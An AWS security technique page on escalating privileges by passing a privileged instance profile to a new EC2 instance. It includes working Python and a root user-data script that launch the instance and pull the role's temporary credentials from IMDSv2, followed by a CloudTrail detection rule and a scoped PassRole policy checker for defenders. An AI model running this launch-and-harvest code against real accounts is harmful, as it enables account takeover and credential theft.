
PassRole to EC2

Severity: high

Category: Privilege Escalation

An attacker who holds iam:PassRole and ec2:RunInstances can launch an EC2 instance with a privileged instance profile attached and then read that role's temporary credentials from the Instance Metadata Service (IMDS) on the instance.

Required Permissions

iam:PassRole
ec2:RunInstances

Description

This technique uses iam:PassRole together with ec2:RunInstances to launch a new EC2 instance with a highly privileged instance profile attached. iam:PassRole is not a separate API call: IAM evaluates it inline when RunInstances names an instance profile, so the only visible action is the launch itself.

The attack flow:
1. Identify an instance profile whose role carries powerful permissions. Enumerating profiles needs read access such as iam:ListInstanceProfiles or iam:ListRoles; without it, profile names are often already known from the environment or guessable from naming conventions.
2. Launch a new EC2 instance with that instance profile and either the attacker's SSH key pair or a user data script. User data runs as root on first boot, so an interactive login is optional: the script itself can read the credentials.
3. On the instance, query the Instance Metadata Service (IMDS) at 169.254.169.254. With IMDSv2 this is a two-step exchange: PUT to /latest/api/token to obtain a session token, then GET /latest/meta-data/iam/security-credentials/<role-name> with the token in the X-aws-ec2-metadata-token header.
4. Retrieve the temporary credentials (access key ID, secret access key and session token) for the attached role.
5. Use those credentials, from the instance or from anywhere else, to perform privileged actions.

This is particularly effective because instance profiles often carry broad permissions for application deployments, and the credentials served by IMDS are long-lived in practice: each set is valid for several hours (typically around six), and the service rotates them automatically, so access continues for as long as the instance is running.
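The launch request for step 2 and the IMDSv2 credential query for steps 3 and 4, as an added example that is not code from the original page. The instance profile name, key pair name and AMI ID are hypothetical placeholders; the `http` transport of `fetch_role_credentials` is injectable so the exchange can be exercised without an EC2 instance.

```python
# Added example, not code from the original page: the launch request for
# step 2 and the IMDSv2 credential query for steps 3 and 4. The profile,
# key pair and AMI names are hypothetical placeholders.
import base64
import json
import urllib.request

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"

def build_user_data() -> str:
    """Cloud-init script run as root at first boot: do the IMDSv2 two-step
    (PUT for a session token, GET with the token header) and park the
    role credentials where the SSH session can read them."""
    hdr = '-H "X-aws-ec2-metadata-token: $TOKEN"'
    return (
        "#!/bin/bash\n"
        "TOKEN=$(curl -s -X PUT " + IMDS + "/latest/api/token "
        "-H 'X-aws-ec2-metadata-token-ttl-seconds: 21600')\n"
        "ROLE=$(curl -s " + hdr + " " + IMDS + CREDS_PATH + ")\n"
        "curl -s " + hdr + " " + IMDS + CREDS_PATH + "$ROLE > /root/creds.json\n"
    )

def build_run_instances_request(profile_name: str, key_name: str, ami_id: str) -> dict:
    """RunInstances parameters. IamInstanceProfile is what triggers the
    inline iam:PassRole check on the profile's role; there is no separate
    PassRole API call. UserData is base64 as the raw API expects (boto3's
    run_instances encodes it for you, so pass build_user_data() there)."""
    return {
        "ImageId": ami_id,
        "InstanceType": "t3.micro",
        "MinCount": 1,
        "MaxCount": 1,
        "KeyName": key_name,
        "IamInstanceProfile": {"Name": profile_name},
        "UserData": base64.b64encode(build_user_data().encode()).decode(),
    }

def _http(method: str, url: str, headers: dict) -> str:
    req = urllib.request.Request(url, method=method, headers=headers)
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.read().decode()

def fetch_role_credentials(http=_http, base: str = IMDS) -> dict:
    """Same IMDSv2 exchange from an SSH session on the instance. `http` is
    injectable so the flow can be exercised off-instance with a fake."""
    token = http("PUT", base + "/latest/api/token",
                 {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    hdr = {"X-aws-ec2-metadata-token": token}
    role = http("GET", base + CREDS_PATH, hdr).strip()
    creds = json.loads(http("GET", base + CREDS_PATH + role, hdr))
    # Step 5: these three values configure any AWS SDK or the CLI as a session.
    return {
        "role": role,
        "aws_access_key_id": creds["AccessKeyId"],
        "aws_secret_access_key": creds["SecretAccessKey"],
        "aws_session_token": creds["Token"],
        "expiration": creds["Expiration"],
    }

if __name__ == "__main__":
    req = build_run_instances_request("deploy-admin-profile", "attacker-key",
                                      "ami-0123456789abcdef0")
    print(json.dumps(req, indent=2))
```

Nothing in the request is unusual except the IamInstanceProfile field, which is why the defender's only signal on the API side is the RunInstances record itself.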

Impact

The attacker obtains every permission granted to the instance profile's role, which for deployment profiles frequently means administrative access to the account. The credentials are readable from IMDS by any process on the instance, are valid for hours, and are renewed automatically while the instance runs, so the foothold persists until the instance is terminated or the role's permissions are changed.

Detection

Monitor CloudTrail for ec2:RunInstances events whose requestParameters.iamInstanceProfile names a high-privilege profile, and baseline which principals normally pass each profile; a developer user passing a deployment-admin profile is the signal. iam:PassRole does not produce its own CloudTrail event, so the RunInstances record is the only place the pass is visible. Alert on launches that use unapproved AMIs, supply user data (CloudTrail redacts its content but records that it was present), use a key pair the launcher does not normally use, or originate from unusual principals, regions or source IPs. Also watch for the stolen credentials being used off the instance: a session of the instance profile's role calling the API from an address that is not the instance's.
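A detection of the kind described above, run over constructed CloudTrail RunInstances records, as an added example that is not part of the original page. The account ID, profile names, allow-lists and sample events are all hypothetical; the record layout follows CloudTrail's requestParameters.iamInstanceProfile, instancesSet and userIdentity.sessionContext.sessionIssuer fields.

```python
# Added example, not code from the original page: a detection run over
# constructed CloudTrail RunInstances records. Account ID, profile names,
# the allow-lists and the sample events are all hypothetical.

# Instance profiles whose roles are broad enough to care about (assumed).
PRIVILEGED_PROFILES = {"deploy-admin-profile"}
# Roles expected to pass those profiles, e.g. a CI deployer (assumed).
ALLOWED_LAUNCHERS = {"arn:aws:iam::111122223333:role/ci-deployer"}
# Golden AMIs the deploy pipeline launches from (assumed).
APPROVED_AMIS = {"ami-0123456789abcdef0"}

def _profile_name(event):
    # CloudTrail records the passed profile under requestParameters.
    # iamInstanceProfile as {"name": ...} or {"arn": ...}. The iam:PassRole
    # check is inline to RunInstances and produces no separate event.
    prof = (event.get("requestParameters") or {}).get("iamInstanceProfile") or {}
    if prof.get("name"):
        return prof["name"]
    if prof.get("arn"):
        return prof["arn"].rsplit("/", 1)[-1]
    return None

def _launcher(event):
    # For assumed-role sessions the stable identity is the issuing role,
    # not the arn:aws:sts::...:assumed-role/NAME/session ARN.
    ident = event.get("userIdentity") or {}
    issuer = (ident.get("sessionContext") or {}).get("sessionIssuer") or {}
    return issuer.get("arn") or ident.get("arn", "")

def evaluate(event):
    """Return the reasons this event is suspicious; an empty list means benign."""
    if event.get("eventName") != "RunInstances":
        return []
    name = _profile_name(event)
    if name not in PRIVILEGED_PROFILES:
        return []
    launcher = _launcher(event)
    if launcher in ALLOWED_LAUNCHERS:
        return []
    reasons = ["privileged profile %s passed by unexpected principal %s" % (name, launcher)]
    params = event.get("requestParameters") or {}
    for item in (params.get("instancesSet") or {}).get("items", []):
        if item.get("imageId") not in APPROVED_AMIS:
            reasons.append("unapproved AMI %s" % item.get("imageId"))
    # CloudTrail redacts the user data body, but its presence is visible.
    if params.get("userData"):
        reasons.append("user data supplied at launch")
    return reasons

def scan(events):
    """Map eventID -> reasons for every event that trips the rule."""
    return {e["eventID"]: r for e in events if (r := evaluate(e))}

# Constructed sample records (not real CloudTrail output).
SAMPLE_EVENTS = [
    {   # CI deployer launching the golden AMI with the admin profile: expected
        "eventID": "e1", "eventName": "RunInstances",
        "userIdentity": {"type": "AssumedRole",
            "arn": "arn:aws:sts::111122223333:assumed-role/ci-deployer/build-42",
            "sessionContext": {"sessionIssuer": {
                "arn": "arn:aws:iam::111122223333:role/ci-deployer"}}},
        "requestParameters": {
            "iamInstanceProfile": {"name": "deploy-admin-profile"},
            "instancesSet": {"items": [{"imageId": "ami-0123456789abcdef0"}]}},
    },
    {   # developer user passing the admin profile with a foreign AMI and user data
        "eventID": "e2", "eventName": "RunInstances",
        "userIdentity": {"type": "IAMUser",
            "arn": "arn:aws:iam::111122223333:user/dev-alice"},
        "requestParameters": {
            "iamInstanceProfile": {
                "arn": "arn:aws:iam::111122223333:instance-profile/deploy-admin-profile"},
            "instancesSet": {"items": [{"imageId": "ami-0fedcba9876543210"}]},
            "userData": "<sensitiveDataRemoved>"},
    },
    {   # same developer, unprivileged profile: out of scope for this rule
        "eventID": "e3", "eventName": "RunInstances",
        "userIdentity": {"type": "IAMUser",
            "arn": "arn:aws:iam::111122223333:user/dev-alice"},
        "requestParameters": {
            "iamInstanceProfile": {"name": "web-readonly-profile"},
            "instancesSet": {"items": [{"imageId": "ami-0123456789abcdef0"}]}},
    },
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS).items():
        print(event_id, reasons)
```

The allow-list on the launcher is what keeps the rule quiet: the privileged profile is legitimately passed every day by the pipeline, so the profile alone is not a signal, the profile plus an unexpected principal is.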

Mitigation

Scope iam:PassRole to specific role ARNs rather than Resource "*", and add the iam:PassedToService condition so a role can only be passed to ec2.amazonaws.com; identities that need to launch instances should not be able to pass administrative roles at all. Apply least privilege to instance profiles, since the role's permissions are the ceiling of what this technique yields. Requiring IMDSv2 (HttpTokens=required) with a hop limit of 1 is still worth enforcing, but be clear about what it mitigates: it blocks SSRF and proxied credential theft through an application on the instance, not this technique, because an attacker who launched the instance runs code on it and can complete the IMDSv2 token exchange themselves.
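The over-broad PassRole grant beside the scoped one, as an added example that is not part of the original page, with a simplified checker for which roles a policy lets a principal hand to EC2. The account ID and role names are hypothetical, and the checker models only Action/Resource matching and the iam:PassedToService condition, not full IAM evaluation (use the IAM policy simulator for that).

```python
# Added example, not code from the original page: the over-broad PassRole
# grant beside a scoped one, with a simplified checker for which roles a
# policy lets a principal hand to EC2. Account ID and role names are
# hypothetical; the checker models only Action/Resource matching and the
# iam:PassedToService condition, not full IAM evaluation.
import fnmatch

ACCOUNT = "111122223333"
DEPLOY_ROLE = "arn:aws:iam::" + ACCOUNT + ":role/app-deploy-role"
ADMIN_ROLE = "arn:aws:iam::" + ACCOUNT + ":role/deploy-admin-role"

# Weak: any role in the account can be attached to any instance.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["iam:PassRole", "ec2:RunInstances"],
        "Resource": "*",
    }],
}

# Scoped: RunInstances is unchanged, but PassRole is pinned to one role ARN
# and to the EC2 service principal via iam:PassedToService.
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "ec2:RunInstances", "Resource": "*"},
        {
            "Effect": "Allow",
            "Action": "iam:PassRole",
            "Resource": DEPLOY_ROLE,
            "Condition": {"StringEquals": {"iam:PassedToService": "ec2.amazonaws.com"}},
        },
    ],
}

# Metadata hardening to set at launch (or via ModifyInstanceMetadataOptions).
# It stops SSRF-style credential theft through an app on the instance; it does
# not stop this technique, since the attacker runs code on the instance.
HARDENED_METADATA_OPTIONS = {"HttpTokens": "required", "HttpPutResponseHopLimit": 1}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def can_pass_role(policy, role_arn, service="ec2.amazonaws.com"):
    """Simplified evaluation: an explicit Deny wins; otherwise any Allow whose
    Action covers iam:PassRole, whose Resource matches the role ARN and whose
    iam:PassedToService condition (if present) includes `service` grants it."""
    allowed = False
    for stmt in policy["Statement"]:
        if not any(fnmatch.fnmatchcase("iam:PassRole", a) for a in _as_list(stmt["Action"])):
            continue
        if not any(fnmatch.fnmatchcase(role_arn, r) for r in _as_list(stmt["Resource"])):
            continue
        cond = stmt.get("Condition", {}).get("StringEquals", {}).get("iam:PassedToService")
        if cond is not None and service not in _as_list(cond):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed

if __name__ == "__main__":
    for label, policy in (("weak", WEAK_POLICY), ("scoped", SCOPED_POLICY)):
        print(label, "admin:", can_pass_role(policy, ADMIN_ROLE),
              "deploy:", can_pass_role(policy, DEPLOY_ROLE))
```

Under the weak policy the launcher can attach any role in the account, including the admin one; under the scoped policy only the deployment role can be passed, and only to EC2, so the same identity can no longer reach a more privileged role through this technique.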